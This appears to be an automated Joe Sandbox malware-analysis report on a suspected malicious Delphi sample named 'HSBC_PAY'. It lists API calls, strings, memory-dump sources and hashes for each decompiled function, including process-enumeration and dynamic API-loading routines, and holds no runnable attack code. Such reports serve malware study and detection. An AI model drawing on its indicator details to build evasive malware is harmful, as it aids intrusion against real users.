                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                    • API String ID: 667068680-597814768
                                                                    • Opcode ID: 0d3a56ff6cd36b87c1b0926fddba2d017ca1b3aea3c4c0ccd47477962535518c
                                                                    • Instruction ID: cb15384628f0f40e9d55e49b3f369a8432e46b599302a992e7fc832597a5aba7
                                                                    • Opcode Fuzzy Hash: 0d3a56ff6cd36b87c1b0926fddba2d017ca1b3aea3c4c0ccd47477962535518c
                                                                    • Instruction Fuzzy Hash: 063138B0AC1770EFFF15AFB5D985A2637E9BB05B00B000966A506CF605EE74DC528FA1
                                                                    Function 02A858B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A858D1
                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02A858E8
                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 02A85918
                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A8597C
                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859B2
                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859C5
                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859D7
                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000,02AAD790), ref: 02A859E3
                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8,02A80000), ref: 02A85A17
                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A86BC8), ref: 02A85A23
                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02A85A45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                    • API String ID: 3245196872-1565342463
                                                                    • Opcode ID: 43daf681605505677927f10ee362628d7afc1999602cfc11459fb040b9c7fd2c
                                                                    • Instruction ID: a6b2fd6b3bd606f444dae52d22d4e6edfccb5f7984513e4d3df341d2dc38d26d
                                                                    • Opcode Fuzzy Hash: 43daf681605505677927f10ee362628d7afc1999602cfc11459fb040b9c7fd2c
                                                                    • Instruction Fuzzy Hash: 63418E71D40218AFDB10EBE8CDC8AEEB3BDAF08310F4545A5A958E7241EB309B458F54
                                                                    Function 02A85B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02A85B94
                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02A85BA1
                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02A85BA7
                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02A85BD2
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C19
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C29
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02A85C51
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02A85C61
                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02A85C87
                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02A85C97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                    • API String ID: 1599918012-2375825460
                                                                    • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                    • Instruction ID: 3ce2e941c197f0372b90095c426e6499db8e69afb740b59f6d1324c651815ff6
                                                                    • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                    • Instruction Fuzzy Hash: 913187B1E4021C2AEB25EAB4DC85FEFB7AD5B04380F4501F19A48E6181FF749E448F91
                                                                    Function 02A87F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02A87F75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1705453755-0
                                                                    • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                    • Instruction ID: 364afdc89b2573b91861b8251fd3c3bfaf2f7640b844dec2be6f563d696218d8
                                                                    • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                    • Instruction Fuzzy Hash: F311C0B5E00209AFDB04DF99C981DAFF7F9EFC8704B14C569A505EB254E6719E01CB90
                                                                    Function 02A8A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                    • Instruction ID: dd530821664c06a48c2a1219b756c64ddb3264b014a839b557647a4e3176d1ba
                                                                    • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                    • Instruction Fuzzy Hash: A6E0D83570021457D315B5685D80AFA73AD975C710F00417FBD05C7341FDB09D404EE8
                                                                    Function 02A8B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExA.KERNEL32(?,02AAC106,00000000,02AAC11E), ref: 02A8B71A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Version
                                                                    • String ID:
                                                                    • API String ID: 1889659487-0
                                                                    • Opcode ID: 1c92c4e586a644b6b4a09bc3d43617e0838dd65bd89985712888fb688397a404
                                                                    • Instruction ID: ff2425a8b6eaddc815bd0f04352a3d617af402a010a09fde6de5a0a170432a41
                                                                    • Opcode Fuzzy Hash: 1c92c4e586a644b6b4a09bc3d43617e0838dd65bd89985712888fb688397a404
                                                                    • Instruction Fuzzy Hash: CAF09D74944B02DFD359EF28D580A2677E5FB48B14F008929E8D8C7B80EB34D826CF66
                                                                    Function 02A8A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02A8BDF2,00000000,02A8C00B,?,?,00000000,00000000), ref: 02A8A7A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID:
                                                                    • API String ID: 2299586839-0
                                                                    • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                    • Instruction ID: 7e43b542e6d912dfb897269a0b519b8374b09f3c73fe66ae55ae5f5277551b95
                                                                    • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                    • Instruction Fuzzy Hash: 0BD05EA730E2A06AA324A15A2D84D7B5AFCCBC57A1F00403EF588C6201D6008C06A6F1
                                                                    Function 02A8918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID:
                                                                    • API String ID: 481472006-0
                                                                    • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                    • Instruction ID: 4bce93c23e9557b03f432764f6d830f8f53708d96985673f4dfeb4f209d1f602
                                                                    • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                    • Instruction Fuzzy Hash: 2FA0110088882002AA803B280C0223A3088A800A20FC80FA0A8F8802E0EE2E022080E3
                                                                    Function 02A820C4 Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                    Function 02A8D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02A8D21D
                                                                      • Part of subcall function 02A8D1E8: GetProcAddress.KERNEL32(00000000), ref: 02A8D201
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                    • API String ID: 1646373207-1918263038
                                                                    • Opcode ID: 4e82901b3b0e7755c08d0c6cfb5615a4cb37ae93ca6397301b9e5eb8c7dd4533
                                                                    • Instruction ID: 0cadf9356afe56f6555f15f03b112544a51cde60fc2160f3d27c338d7fc880f7
                                                                    • Opcode Fuzzy Hash: 4e82901b3b0e7755c08d0c6cfb5615a4cb37ae93ca6397301b9e5eb8c7dd4533
                                                                    • Instruction Fuzzy Hash: 97415D61A85A189B6A087A7D7900867BBDADA887343E0442BF408CF7C5DD30BD574F69
                                                                    Function 02A96E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02A96E5E
                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02A96E6F
                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02A96E7F
                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02A96E8F
                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02A96E9F
                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02A96EAF
                                                                    • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02A96EBF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                    • API String ID: 667068680-2233174745
                                                                    • Opcode ID: c1f05e2bb71cea9994b686809465ffe8e08e228645b2237f5a9e681b27e3f5b5
                                                                    • Instruction ID: fb812a8582a954fc60e0f96d52c182f6504fa41fa167b646e34b88ee1073ad05
                                                                    • Opcode Fuzzy Hash: c1f05e2bb71cea9994b686809465ffe8e08e228645b2237f5a9e681b27e3f5b5
                                                                    • Instruction Fuzzy Hash: 87F045B1AC97927EBB04BF729E819272BDDBE01F04750193A644369902EFB5C8164F60
                                                                    Function 02A82530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02A828CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                    • API String ID: 2030045667-32948583
                                                                    • Opcode ID: 737cf7c6b756bdc007008754f1437b1ed68d2522485674bde860fa4090df512b
                                                                    • Instruction ID: 32d07e198c4f8c1e46600f9f5b9b977951a19165f01a17352d7ee43313617dfd
                                                                    • Opcode Fuzzy Hash: 737cf7c6b756bdc007008754f1437b1ed68d2522485674bde860fa4090df512b
                                                                    • Instruction Fuzzy Hash: 5CA1C130A042D48BEF21BB2CCC84BB9BAF5EB09750F1440E5ED49AB285CF758989CF51
                                                                    Function 02A8252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • An unexpected memory leak has occurred. , xrefs: 02A82690
                                                                    • , xrefs: 02A82814
                                                                    • Unexpected Memory Leak, xrefs: 02A828C0
                                                                    • The unexpected small block leaks are:, xrefs: 02A82707
                                                                    • bytes: , xrefs: 02A8275D
                                                                    • 7, xrefs: 02A826A1
                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02A82849
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                    • API String ID: 0-2723507874
                                                                    • Opcode ID: 1485e7066273d7331976a2d391bca5776e99aaa353895db8151088ff474a6d2a
                                                                    • Instruction ID: fdcece71769f0347612566b56189e04db610367b0f5fb698a1f921f14c24ee2b
                                                                    • Opcode Fuzzy Hash: 1485e7066273d7331976a2d391bca5776e99aaa353895db8151088ff474a6d2a
                                                                    • Instruction Fuzzy Hash: D371A030A042D88FEF21BB2CCC84BE9BAF5EB09754F1041E5D949AB281DF758A85CF51
                                                                    Function 02A8BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetThreadLocale.KERNEL32(00000000,02A8C00B,?,?,00000000,00000000), ref: 02A8BD76
                                                                      • Part of subcall function 02A8A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A8A762
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706022220.0000000002AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1706053798.0000000002BD8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a80000_HSBC_PAY.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoThread
                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                    • API String ID: 4232894706-2493093252
                                                                    • Opcode ID: 05afff34b131aa8ce07b18a6b23943b7f10d01bd71049e34dff70856975f1b59
                                                                    • Instruction ID: a0688e9d0030671ac629e2457d5b74ad94c0ceaf2191f91575483392f8a16d92
                                                                    • Opcode Fuzzy Hash: 05afff34b131aa8ce07b18a6b23943b7f10d01bd71049e34dff70856975f1b59
                                                                    • Instruction Fuzzy Hash: 1A614F34B802499BDB05FBA4DD90A9FB7B7AB48300F509836E101EB645DE39DD069FA0
                                                                    Function 02A9AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9AE38
                                                                    • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02A9AE4F
                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02A9AEE3
                                                                    • IsBadReadPtr.KERNEL32(?,00000002), ref: 02A9AEEF
                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 02A9AF03
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705823282.0000000002A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705768223.0000000002A80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705906444.0000000002AAD000.00000004.00001000.00020000.00000000.sdmpDownload File
